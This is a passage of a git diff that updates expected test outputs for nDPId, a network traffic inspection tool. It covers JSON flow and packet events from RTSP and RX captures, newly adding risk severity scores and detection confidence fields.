-~~ total memory allocated....: 4632889 bytes
-~~ total memory freed........: 4632889 bytes
-~~ total allocations/frees...: 100147/100147
+~~ total memory allocated....: 4715874 bytes
+~~ total memory freed........: 4715874 bytes
+~~ total allocations/frees...: 101737/101737
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 159 chars
-~~ json string max len.......: 696 chars
-~~ json string avg len.......: 497 chars
+~~ json string max len.......: 805 chars
+~~ json string avg len.......: 552 chars
diff --git a/test/results/rtsp_setup_http.pcapng.out b/test/results/rtsp_setup_http.pcapng.out
index fdc0a57a2..a6c2c5eb1 100644
--- a/test/results/rtsp_setup_http.pcapng.out
+++ b/test/results/rtsp_setup_http.pcapng.out
@@ -1,8 +1,8 @@
 00449{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625568705778,"flow_last_seen":1625568705778,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1625568705778,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.4.26","src_port":63840,"dst_port":8554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1625568705778,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"ts_msec":1625568705778,"pkt":"AAwpI6CIeCSvPj0DCABFAADbwOlAAEAGFzesHAWqrBwEGvlgIWqjD4UUiv5WgFAYA\/\/+rgAAU0VUVVAgcnRzcDovLzE3Mi4yOC40LjI2Ojg1NTQvdHJhY2tJRD04OCBSVFNQLzEuMA0KQ1NlcTogNA0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpUcmFuc3BvcnQ6IFJUUC9BVlA7dW5pY2FzdDtjbGllbnRfcG9ydD01MDIyMC01MDIyMQ0KDQo="}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625568705778,"flow_last_seen":1625568705778,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1625568705778,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.4.26","src_port":63840,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"RTSP","breed":"Fun","category":"Media"}}
-00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1625568705778,"flow_last_seen":1625568705778,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1625568705778,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.4.26","src_port":63840,"dst_port":8554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"RTSP","breed":"Fun","category":"Media"}}
+00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625568705778,"flow_last_seen":1625568705778,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1625568705778,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.4.26","src_port":63840,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}}
+00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1625568705778,"flow_last_seen":1625568705778,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1625568705778,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.4.26","src_port":63840,"dst_port":8554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}}
 00164{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","total-events-serialized":6}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 1/1
@@ -12,10 +12,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4596958 bytes
-~~ total memory freed........: 4596958 bytes
-~~ total allocations/frees...: 99556/99556
+~~ total memory allocated....: 4681911 bytes
+~~ total memory freed........: 4681911 bytes
+~~ total allocations/frees...: 101146/101146
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 169 chars
-~~ json string max len.......: 710 chars
-~~ json string avg len.......: 496 chars
+~~ json string max len.......: 819 chars
+~~ json string avg len.......: 542 chars
diff --git a/test/results/rx.pcap.out b/test/results/rx.pcap.out
index 032bd8fe0..26e6e4138 100644
--- a/test/results/rx.pcap.out
+++ b/test/results/rx.pcap.out
@@ -1,34 +1,34 @@
 00434{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"rx.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rx.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1460647264018,"flow_last_seen":1460647264018,"flow_idle_time":180000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":0,"ts_msec":1460647264018,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":41559,"dst_port":7002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00816{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rx.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1460647264018,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":334,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":334,"pkt_l4_len":300,"ts_msec":1460647264018,"pkt":"PIqwbTfwAAjK968mCABFAAFA5\/AAAEARo32DctuowKfOfKJXG1oBLBrkVw+1YFw\/yYgAAAABAAAAAQAAAAEBBQAAAAAASQAAAfgAAAABAAAAZwAAAGkAAABvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
-00603{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"rx.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1460647264018,"flow_last_seen":1460647264018,"flow_idle_time":180000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":0,"ts_msec":1460647264018,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":41559,"dst_port":7002,"l4_proto":"udp","ndpi": {"proto":"RX","breed":"Acceptable","category":"RPC"}}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rx.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1460647264026,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1460647264026,"pkt":"AAjK968mPIqwbTfwCABFAABAOykAADoRV0XAp858g3LbqBtaolcALPkKVw+1YFw\/yYgAAAABAAAAAQAAAAEBBAAAAAAASQAAAAEAACcR"}
+00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"rx.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1460647264018,"flow_last_seen":1460647264026,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":164,"midstream":0,"ts_msec":1460647264026,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":41559,"dst_port":7002,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}}
 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rx.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1460647264026,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"ts_msec":1460647264026,"pkt":"PIqwbTfwAAjK968mCABFAABd5\/IAAEARpF6DctuowKfOfKJXG1oASRKnVw+1YFw\/yYgAAAABAAAAAAAAAAICIQAAAAAASQAAAAAAAAACAAAAAQAAAAAIAAAAAAAAFjwAAAWkAAAAIAAAAAQ="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"rx.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1460647283326,"flow_last_seen":1460647283326,"flow_idle_time":180000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":0,"ts_msec":1460647283326,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":38331,"dst_port":7002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00814{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"rx.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1460647283326,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":334,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":334,"pkt_l4_len":300,"ts_msec":1460647283326,"pkt":"PIqwbTfwAAjK968mCABFAAFA6DUAAEARoziDctuowKfOfJW7G1oBLLHjVw+1c1wtPyQAAAABAAAAAQAAAAEBBQAAAAAASQAAAfgAAAABAAAAZwAAAGkAAABvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
-00603{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"rx.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1460647283326,"flow_last_seen":1460647283326,"flow_idle_time":180000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":0,"ts_msec":1460647283326,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":38331,"dst_port":7002,"l4_proto":"udp","ndpi": {"proto":"RX","breed":"Acceptable","category":"RPC"}}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"rx.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1460647283340,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1460647283340,"pkt":"AAjK968mPIqwbTfwCABFAABATVwAADoRRRLAp858g3LbqBtalbsALJAKVw+1c1wtPyQAAAABAAAAAQAAAAEBBAAAAAAASQAAAAEAACcR"}
+00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"rx.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1460647283326,"flow_last_seen":1460647283340,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":164,"midstream":0,"ts_msec":1460647283340,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":38331,"dst_port":7002,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}}
 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"rx.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1460647283340,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"ts_msec":1460647283340,"pkt":"PIqwbTfwAAjK968mCABFAABd6DcAAEARpBmDctuowKfOfJW7G1oASammVw+1c1wtPyQAAAABAAAAAAAAAAICIQAAAAAASQAAAAAAAAACAAAAAQAAAAAIAAAAAAAAFjwAAAWkAAAAIAAAAAQ="}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"rx.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1460647299605,"flow_last_seen":1460647299605,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1460647299605,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"rx.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1460647299605,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1460647299605,"pkt":"PIqwbTfwAAjK968mCABFAABM9uIAAEARlX+DctuowKfOfBtZG1sAOL9z1w+zMFwiT6wAAAABAAAAAQAAAAEBBQAAAAAANAAAAg8AAAAJcm9vdC5jZWxsAAAA"}
-00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"rx.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1460647299605,"flow_last_seen":1460647299605,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1460647299605,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7003,"l4_proto":"udp","ndpi": {"proto":"RX","breed":"Acceptable","category":"RPC"}}
 01887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"rx.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1460647299669,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1118,"pkt_l4_len":1084,"ts_msec":1460647299669,"pkt":"AAjK968mPIqwbTfwCABFAARQURUAADoRPUnAp858g3LbqBtbG1kEPOsl1w+zMFwiT6wAAAABAAAAAQAAAAEBBAAAAAAANAAAAHIAAABvAAAAbwAAAHQAAAAuAAAAYwAAAGUAAABsAAAAbAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwBuMngAAEMHAAAfwf\/\/\/6MAAAAlAAAAAQAAAAEAAAAAAAAAf\/\/\/\/6oAAAB3AIQN5gAA+50AABAS\/\/\/\/mP\/\/\/4QAAAABAAAAAQAAAAAAAAB\/\/\/\/\/qgAAAHcAbjJ4AABDBwAAH8H\/\/\/+jAAAAJQAAAAEAAAABAAAAAAAAAH\/\/\/\/+qAAAAdwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADwAAAA8AAAAPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAAAEgAAABIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAyAAAAROcGeMAAAAAAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
+00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"rx.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1460647299605,"flow_last_seen":1460647299669,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":1124,"flow_avg_l4_payload_len":562,"midstream":0,"ts_msec":1460647299669,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7003,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}}
 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"rx.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1460647299669,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"ts_msec":1460647299669,"pkt":"PIqwbTfwAAjK968mCABFAABd9usAAEARlWWDctuowKfOfBtZG1sASZXi1w+zMFwiT6wAAAABAAAAAAAAAAICIQAAAAAANAAAAAAAAAACAAAAAQAAAAAIAAAAAAAAFjwAAAWkAAAAIAAAAAQ="}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"rx.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1460647299704,"flow_last_seen":1460647299704,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1460647299704,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.241","src_port":7001,"dst_port":7000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"rx.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1460647299704,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1460647299704,"pkt":"PIqwbTfwAAjK968mCABFAAA8LUMAAEARXrqDctuowKfO8RtZG1gAKKMX1w+zMFwiT7AAAAABAAAAAQAAAAEBBQAAAAAAAQABAAQ="}
-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"rx.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1460647299704,"flow_last_seen":1460647299704,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1460647299704,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.241","src_port":7001,"dst_port":7000,"l4_proto":"udp","ndpi": {"proto":"RX","breed":"Acceptable","category":"RPC"}}
 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"rx.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1460647299782,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"ts_msec":1460647299782,"pkt":"AAjK968mPIqwbTfwCABFAABeF80AADoReg7Ap87xg3LbqBtYG1kASo9g1w+zMFwiT7AAAAABAAAAAAAAAAECIgAAAAAAAQAAAAAAAAABAAAAAQAAAAAGAQEAAAAAAAWkAAAFpAAAABAAAAAB"}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"rx.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1460647299704,"flow_last_seen":1460647299782,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1460647299782,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.241","src_port":7001,"dst_port":7000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}}
 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"rx.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1460647299782,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"ts_msec":1460647299782,"pkt":"PIqwbTfwAAjK968mCABFAABdLVQAAEARXoiDctuowKfO8RtZG1gASaag1w+zMFwiT7AAAAABAAAAAAAAAAICIQAAAAAAAQAAAAAAAAABAAAAAAAAAAEHAAAAAAAAFjwAAAWkAAAAEAAAAAQ="}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"rx.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1460647299986,"flow_last_seen":1460647299986,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1460647299986,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"rx.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1460647299986,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1460647299986,"pkt":"PIqwbTfwAAjK968mCABFAAA89w8AAEARlWKDctuowKfOfBtZG1gAKKOI1w+zMFwiT7QAAAABAAAAAQAAAAEBBQAAAAAAAQABAAQ="}
-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"rx.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1460647299986,"flow_last_seen":1460647299986,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1460647299986,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7000,"l4_proto":"udp","ndpi": {"proto":"RX","breed":"Acceptable","category":"RPC"}}
 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"rx.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1460647300017,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"ts_msec":1460647300017,"pkt":"AAjK968mPIqwbTfwCABFAABeUWIAADoRQO7Ap858g3LbqBtYG1kASjJ01w+zMFwiT7QAAAABAAAAAAAAAAECIgAAXV0AAQAAAAAAAAABAAAAAQAAAAAGAQEAAAAAAAWkAAAFpAAAABAAAAAB"}
